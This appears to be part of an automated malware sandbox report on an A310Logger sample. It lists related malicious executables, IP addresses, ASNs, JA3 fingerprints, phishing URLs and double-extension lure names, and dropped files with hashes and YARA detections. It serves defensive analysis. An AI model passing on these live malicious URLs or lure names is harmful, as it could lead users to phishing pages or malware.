                                                                              • 51.81.194.202
                                                                              nUsgNI2VV6.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              Kd3h0VWHCT.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              Duc invoice.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              LxSiksaL23.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              icanhazip.comVW16JuYECF.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              3djX04cCOE.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              Halkbank,.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              Revised shipment.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              Swift.txt.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              Micro tunneling Drawings.pdf1.4MB.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              C5fOab30UG.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              9KZPWGuxKu.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              9ED17l5AHb.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              Demmurage_INV00245.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              PO 7500093232.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              doc 20220726 009910 984993.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              Ziraat Bankas Swift Mesaj.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              yHYWC.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              n0k4chByJm.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              hesaphareketi-01.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              doc 27008875424678 001.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.114.97
                                                                              Invoice no. 004.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              sample.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97
                                                                              Doc899780979080888.pdf.exeGet hashmaliciousBrowse
                                                                              • 104.18.115.97

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              OVHFRhttps://www.frontrush.com/FR_Web_App/Message/MessageTracking.aspx?code=ODYzOTUxNTsyNjM3ODcyODtSOzgxOTc7TA==-f+lhm4TMRSg=&redir=http://4267.s1oAXteFRf.beyondsm.com/?=accountsreceivable@seven.com.auGet hashmaliciousBrowse
                                                                              • 51.210.3.236
                                                                              new artwork.exeGet hashmaliciousBrowse
                                                                              • 151.80.78.96
                                                                              new artwork.exeGet hashmaliciousBrowse
                                                                              • 151.80.78.96
                                                                              testfile.jsGet hashmaliciousBrowse
                                                                              • 213.186.33.19
                                                                              What_is_digital_contract_note (df).jsGet hashmaliciousBrowse
                                                                              • 188.165.135.193
                                                                              https://cdeusa.od2.vtiger.com/pages/8f3624gue6_98246trf7Get hashmaliciousBrowse
                                                                              • 149.56.27.11
                                                                              https://objectstorage.eu-frankfurt-1.oraclecloud.com/n/fr7vvvtoichy/b/SHAR3P0IN7forVI3W/o/5star.htmlGet hashmaliciousBrowse
                                                                              • 51.210.156.152
                                                                              http://r.newsletter.data-enrich.comGet hashmaliciousBrowse
                                                                              • 46.105.126.224
                                                                              https://emelia.link/jrVdzeXIojlGet hashmaliciousBrowse
                                                                              • 5.196.213.214
                                                                              Length_of_tenancy_agreements (zue).jsGet hashmaliciousBrowse
                                                                              • 213.186.33.19
                                                                              https://brawleyed-my.sharepoint.com:443/:o:/g/personal/pat_diaz_besd_org/Ek8mAaZEiZlEh3_TyUIqgmwBcChgMgalTBbpDY0zl8vn5w?e=5%3aA3aDr8&at=9Get hashmaliciousBrowse
                                                                              • 51.210.32.103
                                                                              Difference_between_service_level_agreement_and_memorandum_of_understan (ey).jsGet hashmaliciousBrowse
                                                                              • 213.186.33.19
                                                                              tD0xQrHoVu.exeGet hashmaliciousBrowse
                                                                              • 51.254.27.112
                                                                              BL InvoiceShipping_Document ChinaFOB_PDF.exeGet hashmaliciousBrowse
                                                                              • 79.137.64.70
                                                                              ZPS- 3668-2022.xlsxGet hashmaliciousBrowse
                                                                              • 167.114.173.168
                                                                              Quotation 1868939_2022-08_PDF.exeGet hashmaliciousBrowse
                                                                              • 79.137.64.70
                                                                              PO CPWPKL-1901088.exeGet hashmaliciousBrowse
                                                                              • 151.80.78.96
                                                                              Fax0374#.htmlGet hashmaliciousBrowse
                                                                              • 51.210.3.236
                                                                              Inv#064183.htmlGet hashmaliciousBrowse
                                                                              • 51.210.32.103
                                                                              uNtQjX264N.exeGet hashmaliciousBrowse
                                                                              • 51.91.204.58
                                                                              CLOUDFLARENETUS57lsAxwpQZ.exeGet hashmaliciousBrowse
                                                                              • 162.159.130.233
                                                                              RevisedSalesContractINV.htmlGet hashmaliciousBrowse
                                                                              • 104.18.11.207
                                                                              eeee.hTmLGet hashmaliciousBrowse
                                                                              • 104.18.10.207
                                                                              http://r.email.rdv360.com/tr/cl/tl7Wu25UHrnjkn5sfc0vx0u4dtyo0w00PXMuL2iagRDUR4r6sEL0l9C97pb-2sRztT-v8bXx-XwXmfdSPRXPxbz7LHu0VNziyeYAzkCiIjcvnS7WBSJwBh3b5lynhLuGZ-icKIPKLG1_Nge8zb9RKR3x8-eqdE9Z6NZ1eNGz7xHfVQji-8Y3Ly2KhJRTjnC_XVffoO3v2wTAX7vCTKg95DV-fGkRhyk0Etop2L_GVfVQwjhA4X5PZ4rHEGj4_1HhHvnPUbiBjyJo5lqUbQIGet hashmaliciousBrowse
                                                                              • 172.67.74.163
                                                                              DOCUMENTO DE IMPUESTO PREDIAL.exeGet hashmaliciousBrowse
                                                                              • 162.159.134.233
                                                                              Q3 Bonus1.HTMlGet hashmaliciousBrowse
                                                                              • 104.17.25.14
                                                                              Secured_angela.johnson_Audio_Message.htmGet hashmaliciousBrowse
                                                                              • 172.64.145.85
                                                                              SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousBrowse
                                                                              • 162.159.129.233
                                                                              https://www.frontrush.com/FR_Web_App/Message/MessageTracking.aspx?code=ODYzOTUxNTsyNjM3ODcyODtSOzgxOTc7TA==-f+lhm4TMRSg=&redir=http://4267.s1oAXteFRf.beyondsm.com/?=accountsreceivable@seven.com.auGet hashmaliciousBrowse
                                                                              • 104.17.25.14
                                                                              .htmlGet hashmaliciousBrowse
                                                                              • 104.18.11.207
                                                                              https://securb0a.top/Get hashmaliciousBrowse
                                                                              • 188.114.97.3
                                                                              https://test.katatillo.com/wp-content/wp-contacto/h0k3ts/redir/?m=reena_sood@hotmail.com/Get hashmaliciousBrowse
                                                                              • 172.67.70.233
                                                                              https://drive.google.com/file/d/16SdQLnBJ6tLnj432P6jDRNRwgR6JpZ7c/view?usp=sharingGet hashmaliciousBrowse
                                                                              • 104.18.6.145
                                                                              https://app.pandadoc.com/p/68c56729e1766ba3c2c45de9e71ef2844a97cabc?Get hashmaliciousBrowse
                                                                              • 104.19.154.83
                                                                              xd.x86Get hashmaliciousBrowse
                                                                              • 8.46.48.22
                                                                              Invoice IA-21-0124.htmGet hashmaliciousBrowse
                                                                              • 104.18.11.207
                                                                              http://macaddresschanger.comGet hashmaliciousBrowse
                                                                              • 104.21.4.4
                                                                              TheMoziV1.exeGet hashmaliciousBrowse
                                                                              • 104.21.36.10
                                                                              https://vps67241.inmotionhosting.com/~mombasavacation/kpl/MailUpdateFresh/index.html#Get hashmaliciousBrowse
                                                                              • 188.114.96.3
                                                                              Check#24345.htmlGet hashmaliciousBrowse
                                                                              • 104.18.11.207

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              57f3642b4e37e28f5cbe3020c9331b4cEZbZDkFEQ1.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              GrSqMbdG99.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              7qrNClSmv7.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              CaQ2QvZfBW.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              m7iukFCY93.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              Bc90WRHFvI.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              1MWUDNFaqS.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              JJ4pJ5eAfS.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              044471EOyJ.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              no6slYvsOk.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              nKGZsgg0Ev.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              k8765434567890980.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              LpQ1yuY7ww.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              Quote#099992114842_pdf.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              3fA0f8HFeu.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              nUsgNI2VV6.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              Kd3h0VWHCT.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              Duc invoice.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              LxSiksaL23.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202
                                                                              1mixELaybY.exeGet hashmaliciousBrowse
                                                                              • 51.81.194.202

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                              C:\Users\user\Desktop\lg3gn9y1cj.exe m7iukFCY93.exeGet hashmaliciousBrowse
                                                                                Bc90WRHFvI.exeGet hashmaliciousBrowse

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x8be2707e, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                  Category:dropped
                                                                                  Size (bytes):786432
                                                                                  Entropy (8bit):0.25065011526072395
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:8+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:jSB2nSB2RSjlK/+mLesOj1J2
                                                                                  MD5:11E0C81B5B977B054CA8AAE5E3D8F3E7
                                                                                  SHA1:DC69821A1AD836A32C2AF4CE58813F4674B10C15
                                                                                  SHA-256:0BDE68B06F915CC417F8F8D16E7C20733BF52656CDA47554BF428D1F0E05417F
                                                                                  SHA-512:CEE6D61EE8EAE9470E6DDA2E94EE2321EFCCBC181C95756E630E1F48EB93E9A1FCB752D20DEAF2886CB0017F756AA4E3AA81EC43D49C183319FEBD42B9256B35
                                                                                  Malicious:false
                                                                                  Preview:..p~... ................e.f.3...w........................&..........w..%....z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................:..%....z...................(..%....z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1036
                                                                                  Entropy (8bit):5.356180291633412
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLasXE4qpE4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84j:MNH2HKXwYHKhQnoPtHoxHhAHKzvKvj
                                                                                  MD5:7F8E631F679DF67A018544E516CF841E
                                                                                  SHA1:02F03B1AB3CF33821236F743139693A61906A72B
                                                                                  SHA-256:1FB2E1F28E4A338CD7E04A147E290E1DD880E83054BB2BA48EF6038EBA0BFACD
                                                                                  SHA-512:4F7FD1AC6D22F8891F77BD3359EB0A536AB8E8A3D064BBAAB6620826F6B9FC8FC18DAB73474DB4806ED9CD1F5652549D7122E1DE8E5741010E7B3BE3F79EBBB7
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral,

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cmsys[1].htm

                                                                                  Download File
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):707
                                                                                  Entropy (8bit):5.162345868595955
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:hYYLszHjgfkbxsjJ7QCdToh50lXQoLYlJl5M6eNsJLi334VlKk:hYYIzDIkejNQCRtgoLY95MI5634Vsk
                                                                                  MD5:1304294C0823CA486542BA408ED761E3
                                                                                  SHA1:B2A70FB2D810CA13985882E6981F33998823E83E
                                                                                  SHA-256:3BBE72F3BAA8EC61DE17A1D767FCA58704769684B7ABE9161D0C4EAF4C8F0982
                                                                                  SHA-512:67430E967118D2B2D8A448C583BDE082BF512DA88EAE75B0501EC5A6C2B0BF46936306317BD3DDD956C5C6E01FE0C7DBED43927588EFBA06C5F84D8A557F7B8B
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />.<title> 301 Moved Permanently..</title></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>.<h2 style="margin-top:20px;font-size: 30px;">Moved Permanently..</h2>.<p>The document has been permanently moved.</p>.</div></div></body></html>.

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\what-happened-to-the-old-zxq-website[1].htm

                                                                                  Download File
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                  Category:dropped
                                                                                  Size (bytes):56286
                                                                                  Entropy (8bit):5.402091021498643
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:PyMapcrHsCNwn1d0kelTaGNpSz17sjQRrCjmZIclnlZ+/s:Pq8wnSxdqIclnlZCs
                                                                                  MD5:276F671F15DAEEA9B0A348C035211481
                                                                                  SHA1:0B33726249C5FFEC7A23F44506F533879F46B5AE
                                                                                  SHA-256:380DB9B45C38368CE654C7976EBADA338C026047B020D4924D29B73978399ECE
                                                                                  SHA-512:2502DB102655C3E43A0DD569D2214618676039C3F0BCA37DD9175C2A1B693B76734EDA2E4B51EBE37473B00AF931BB9FFF4DCD9C665485273FBA2CA186102060
                                                                                  Malicious:false
                                                                                  Preview:<!DOCTYPE html>.<html lang="en-US" class="s-dark site-s-dark">..<head>...<meta charset="UTF-8" />..<meta name="viewport" content="width=device-width, initial-scale=1" />..<meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />... This site is optimized with the Yoast SEO Premium plugin v18.0 (Yoast SEO v18.4.1) - https://yoast.com/wordpress/plugins/seo/ -->..<title>What happened to the old ZXQ website? | ZXQ</title><link rel="preload" as="font" href="https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2" type="font/woff2" crossorigin="anonymous" />..<link rel="canonical" href="https://zxq.net/what-happened-to-the-old-zxq-website/" />..<meta property="og:locale" content="en_US" />..<meta property="og:type" content="article" />..<meta property="og:title" content="What happened to the old ZXQ website?" />..<meta property="og:description" content="Information For ZXQ.net Subdomain Owners The old ZXQ website

                                                                                  C:\Users\user\AppData\Local\Temp\~DF01383C41703FF854.TMP

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\Lg3gn9y1Cj.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2645041997918773
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQXK/79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQK/JG7ONEipl
                                                                                  MD5:FA2089793F0B8D2F6F7FCF7176CBCA36
                                                                                  SHA1:4AABD7420EBDD7C6AC87389F00594E4AC1F6055E
                                                                                  SHA-256:42C253738A8FFFE1358E50CC260938485BFA45E2A3A7060335F88D0E027CBAC5
                                                                                  SHA-512:739B193990DA2B3C7D089A6D68C818787F082E5BA000E2B71386D4AFC4AD3E88006969E87664215F8722FBB538E9E0FDCB4FBF8FADEB063C16F5570CA80956CA
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\~DF0ED405DEDEDD664C.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System\svchost.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.263447848067321
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQXxNxlt79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQxNjtJG7ONEipl
                                                                                  MD5:4453DA200C2D970D975190A0F27F6AD0
                                                                                  SHA1:305C9977DACA6FED6D11CCB1117AF3447F53B668
                                                                                  SHA-256:7CEC37BC8E7F81504AF19B87B81052E51306F0A56155E2BD552D66D74643FCBD
                                                                                  SHA-512:1D2B72C0EC734A650A76E4C54E0D274172BFF8819060F45B73DB7C2B9DCF2B9CCB9841B8A0224304C178345C401C5920E138A4E0137A878D956609472C3442DD
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\~DF5EF9070E9B8F5CB4.TMP

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Local\icsys.icn.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2636074265164334
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQX6xX79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQ6BJG7ONEipl
                                                                                  MD5:6A074302EACA2D20A1F728035FE077F3
                                                                                  SHA1:9E3BB65A8DB04B99A1FD94EC0679BB7E90BCFF2D
                                                                                  SHA-256:8A356A8777248937E29E869CC4F65A6D49CB94636187BF58E06EBD9C8E42D6A7
                                                                                  SHA-512:8ABDF5E901255030F1F653CD2F3B05048CAFD0509BB5E07D7DC846629C086D58B1B4BD875D7A07993D0D601704DF0996EAE46F0BF008A8A0F32C4BAB72C49477
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\~DF6E4F50B397B92863.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System\spoolsv.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2645041997918773
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQXaEG79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQaEGJG7ONEipl
                                                                                  MD5:8AF929E2C5779CB4C533178AC1588C15
                                                                                  SHA1:124C03AC67CCB0C2B1E05A4A3D7CE9A0E5C7A3C4
                                                                                  SHA-256:D4484A0EDAD4E7738155F7ED0606B112E08B966D9865A95C4E77888A873E9027
                                                                                  SHA-512:33B032EDF0A9A861039A8BB9DEAA92955E6C8DC9400BFD45A7268DE2957BF6559371506C03FDCF14435111870A0DCBC81C21F922F367CDD011B9398E65BAF08E
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\~DFC593752C91BD8E2F.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System\spoolsv.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2645041997918773
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQX48G79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQ48GJG7ONEipl
                                                                                  MD5:05C56F3D1B7035D139AB304B002C5450
                                                                                  SHA1:14C75C9D3431CEE6E04B03D82492D6CEE54D7A54
                                                                                  SHA-256:D75C59C908DDDB694E6D6AE60D2624FF009CB6DDBEBFE3DB2780B55C44A754F7
                                                                                  SHA-512:0B6EAC857813F0260627F9BAF0FB54D04B813913214B2CF62927576E9FA115D9B376E0E5A7ED1122A4D06842F8D57E5E71F9643239A65ABE8E1184505D70107E
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\~DFD29C7DB29EE1E840.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):1.2606497387666988
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:rl91bxbt+r+CFQXQB79Xa9Xh9XR5+flEij1b5X:rl3b/+PFQ4JG7ONEipl
                                                                                  MD5:20275BBFE0B1568DCBAF7B5A1047C854
                                                                                  SHA1:47542065C1C5CACD6E27DAC85B43F1B2B9948B70
                                                                                  SHA-256:5AAA1419B554FAB42DA577910EC6B26C1E6C24DFAA458BC56D4AF1AB7B8433E3
                                                                                  SHA-512:E69A1ECDBE0891A50C61AEAE8928149D83518196375F864F919767B78488634CE21CFC07625D8B92BD832CA2ECEF7F8C5ED02320BB857B563E4F263D72DF72B9
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\icsys.icn.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\Lg3gn9y1Cj.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):280890
                                                                                  Entropy (8bit):5.207941587783397
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unB:UvEN2U+T6i5LirrllHy4HUcMQY6M
                                                                                  MD5:4223968DA579570E05813854A134397B
                                                                                  SHA1:07BDAA69105CAE6467337D965EB968B6765FE28E
                                                                                  SHA-256:85CE1F5747CE26ADF8191236668B87796ED45B1E15A9B87FA8A2F3C80B9B65FC
                                                                                  SHA-512:C62411E35DB1940412BF5D8132C1A9A4346EC179B23EC57945BE7EA64C5640850CFFF94B122CA980293653B270A0C968C48E0B27AF0AF0BD5BFE177ED72E6BEB
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\stsys.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System\svchost.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):280936
                                                                                  Entropy (8bit):5.212744789348709
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6unD:UvEN2U+T6i5LirrllHy4HUcMQY6G
                                                                                  MD5:9AE508566C73A6DC1E178CD37C7F5A1F
                                                                                  SHA1:19F8704A4FDEBE841B27522167E0BC2DD1BBD710
                                                                                  SHA-256:354C079A4DEE7FCF3E423075B9938DFE58CC3DEDFE8F574C961D5079D2678CAD
                                                                                  SHA-512:FF450C6664C4C2B87E534C1F1447C931DBF457E588A1B320C5FDC1921EA764704C347CDDEA6FB2433ED5320F5F570846420F52BACED2164508B7E0D993BE83C7
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Roaming\mrsys.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):281108
                                                                                  Entropy (8bit):5.226904366194023
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:UvEfVUzSLhIVbV6i5LirrlZrHyrUHUckoMQ2RN6un7:UvEN2U+T6i5LirrllHy4HUcMQY6y
                                                                                  MD5:CB3A6EA5289DC0011C2E80778923121E
                                                                                  SHA1:BA21DB2ADA4182FB6854BA2AD6CC43617A1EAB64
                                                                                  SHA-256:E1FDBFD8A14848EDB78DDEA2F324D56EAFCC89E80A91B77113A48B1791F8872E
                                                                                  SHA-512:562E152B88FF60325CD7A3D5268523A4124DBF48D737DB8CCCCC090E7E8CF32D8084BA40386501DD3A412065C0C044D52A502CA3EAB6C4C6AE6D3075292DF3AE
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1m..P...P...P..zL...P...O...P...O...P..Rich.P..........PE..L......M.....................0......p6............@.............................................................................(...........................................................................P... ....................................text...(........................... ....data...t...........................@....rsrc...............................@..@.tdata.............................. ...$..G............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\lg3gn9y1cj.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\Lg3gn9y1Cj.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):135168
                                                                                  Entropy (8bit):5.556666529655342
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:MPM/Zws3kTnvzbhNBPmxue2SRQg0dkEwiqoViocIdus3h4b6P/C:MYZTkLfhjFSiO3oeIdlsqC
                                                                                  MD5:BEE47439C4960E2728594ECE9AD95BA7
                                                                                  SHA1:43F4B6F607DEC5BEC2A33E2FB4148C38DE832490
                                                                                  SHA-256:8A1902D9C0DBE388B28EF5A9C8EC4C0F1802FC6CCD43471EA337DCB3D71C81D4
                                                                                  SHA-512:AD84D419D61B63E36A6766BA90773B39270BF9C8E72373B52C1979097E73110F749FAD0CFED5C4F233304AD0AF4B6E753666911FF7DB83475C16C38976C46382
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: MALWARE_Win_A310Logger, Description: Detects A310Logger, Source: C:\Users\user\Desktop\lg3gn9y1cj.exe , Author: ditekSHen
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
